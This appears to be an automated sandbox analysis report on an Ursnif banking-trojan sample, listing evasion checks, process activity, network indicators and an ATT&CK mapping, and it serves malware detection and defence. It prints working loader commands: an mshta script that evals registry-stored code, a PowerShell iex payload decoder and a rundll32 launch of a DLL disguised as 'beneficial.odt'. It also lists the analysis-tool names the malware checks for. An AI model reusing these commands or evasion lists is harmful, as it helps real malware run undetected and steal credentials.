            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: AUTORUNSC.EXE
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: EMUL.EXE
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: SBIECTRL.EXE
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: APISPY.EXE
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: $FAKEHTTPSERVER.EXE
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: REGMON.EXEIK
            Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmpBinary or memory string: SBIECTRL.EXEHK
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: WINDBG.EXE
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: SCKTOOL.EXE;HQ
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: IDAQ.EXET
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: WINDUMP.EXE
            Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmpBinary or memory string: HOOKEXPLORER.EXE@
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: SYSANALYZER.EXEA
            Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmpBinary or memory string: APISPY.EXE@
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: PETOOLS.EXEJ
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: PROCMON.EXE
            Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmpBinary or memory string: BEHAVIORDUMPER.EXE
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: HOOKEXPLORER.EXE
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: NETSNIFFER.EXEK
            Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmpBinary or memory string: PEID.EXE@#Z
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: AUTORUNS.EXE@
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: IDAG.EXE:V
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: REGSHOT.EXE
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: WIRESHARK.EXE
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: FORTITRACER.EXEA
            Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmpBinary or memory string: PROCMON.EXE@
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: SBIESVC.EXE
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: IMPORTREC.EXE
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: IMUL.EXE.8
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: Q?$SANDBOXIERPCSS.EXEV5
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
            Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmpBinary or memory string: IDAG.EXEXU
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: PEID.EXE#Z
            Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmpBinary or memory string: SYSANALYZER.EXE
            Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmpBinary or memory string: IDAQ.EXE
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: OLLYDBG.EXE
            Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmpBinary or memory string: PETOOLS.EXE@J
            Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmpBinary or memory string: AUTORUNS.EXE
            Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmpBinary or memory string: IMPORTREC.EXEZ
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: HOOKANAAPP.EXE
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: TCPDUMP.EXE
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: FILEMON.EXET
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: A9$BEHAVIORDUMPER.EXEQ
            Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmpBinary or memory string: IMUL.EXE
            Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmpBinary or memory string: SCKTOOL.EXE
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: DUMPCAP.EXE
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2633
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6508
            Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
            Source: C:\Windows\System32\wscript.exe TID: 1288Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3708Thread sleep time: -4611686018427385s >= -30000s
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 28_2_7030E9E0 IsDebuggerPresent,DebuggerProbe,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 28_2_702E1D62 LoadLibraryA,GetProcAddress,
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\beneficial.odt,DllRegisterServer
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 28_2_702F0890 __NMSG_WRITE,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 28_2_702F8230 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Benign windows process drops PE filesShow sources
            Source: C:\Windows\System32\wscript.exeFile created: beneficial.odt.2.drJump to dropped file
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\SysWOW64\rundll32.exeDomain query: gtr.antoinfer.com
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.228.233.17 80
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xbktblub\xbktblub.cmdline'
            Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Bmd2='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Bmd2).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
            Source: rundll32.exe, 0000001C.00000002.732046214.0000000002E70000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.731837646.000001D680810000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: rundll32.exe, 0000001C.00000002.732046214.0000000002E70000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.731837646.000001D680810000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: rundll32.exe, 0000001C.00000002.732046214.0000000002E70000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.731837646.000001D680810000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: rundll32.exe, 0000001C.00000002.732046214.0000000002E70000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.731837646.000001D680810000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 28_2_04444BDF cpuid
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___crtGetLocaleInfoW,GetLastError,___crtGetLocaleInfoW,__nh_malloc_dbg,___crtGetLocaleInfoW,__nh_malloc_dbg,_strncpy_s,___crtGetLocaleInfoW,_isdigit,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_GetLcidFromDefault,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,_GetLcidFromDefault,GetUserDefaultLangID,_ProcessCodePage,IsValidCodePage,IsValidLocale,_wcscpy_s,GetLocaleInfoA,GetLocaleInfoA,__itow_s,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesA,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: ___getlocaleinfo,__nh_malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,__stricmp,_TestDefaultCountry,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: __nh_malloc_dbg,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_fix_grouping,InterlockedDecrement,InterlockedDecrement,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _GetPrimaryLen,EnumSystemLocalesA,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,__stricmp,GetLocaleInfoA,__stricmp,_TestDefaultCountry,GetLocaleInfoA,__stricmp,_TestDefaultLanguage,__stricmp,_TestDefaultLanguage,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,GetACP,GetLocaleInfoA,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: __nh_malloc_dbg,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_fix_grouping,InterlockedDecrement,InterlockedDecrement,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,_LocaleUpdate::~_LocaleUpdate,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,_LocaleUpdate::~_LocaleUpdate,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLastError,GetLocaleInfoA,GetLocaleInfoW,_malloc,__MarkAllocaS,GetLocaleInfoW,WideCharToMultiByte,WideCharToMultiByte,__freea,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _GetPrimaryLen,EnumSystemLocalesA,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,__stricmp,_TestDefaultLanguage,__stricmp,_TestDefaultLanguage,
            Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 28_2_702E1983 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 28_2_04444BDF wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 28_2_702E1262 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: procmon.exe
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: tcpview.exe
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: wireshark.exe
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: avz.exe
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: cports.exe
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: lordpe.exe
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: icesword.exe
            Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmpBinary or memory string: procexp.exe
            Source: wscript.exe, 00000002.00000003.549558949.00000294B4B1A000.00000004.00000001.sdmpBinary or memory string: autoruns.exe
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: ollydbg.exe
            Source: wscript.exe, 00000002.00000003.551739886.00000294B4B4E000.00000004.00000001.sdmpBinary or memory string: regshot.exe

            Stealing of Sensitive Information:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 0000001C.00000003.690672624.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.684029737.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.692412870.000000000514C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.684015190.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.683939113.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.687299235.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.683982303.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.684001353.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.683872058.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.683963562.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.683912558.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 0000001C.00000003.690672624.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.684029737.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.692412870.000000000514C000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.684015190.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.683939113.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.687299235.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.683982303.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.684001353.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.683872058.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.683963562.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001C.00000003.683912558.0000000005348000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4576, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation221Path InterceptionProcess Injection112Disable or Modify Tools1Credential API Hooking3System Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
            Default AccountsScripting121Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDeobfuscate/Decode Files or Information1LSASS MemoryAccount Discovery1Remote Desktop ProtocolEmail Collection1Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsNative API2Logon Script (Windows)Logon Script (Windows)Scripting121Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesCredential API Hooking3Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
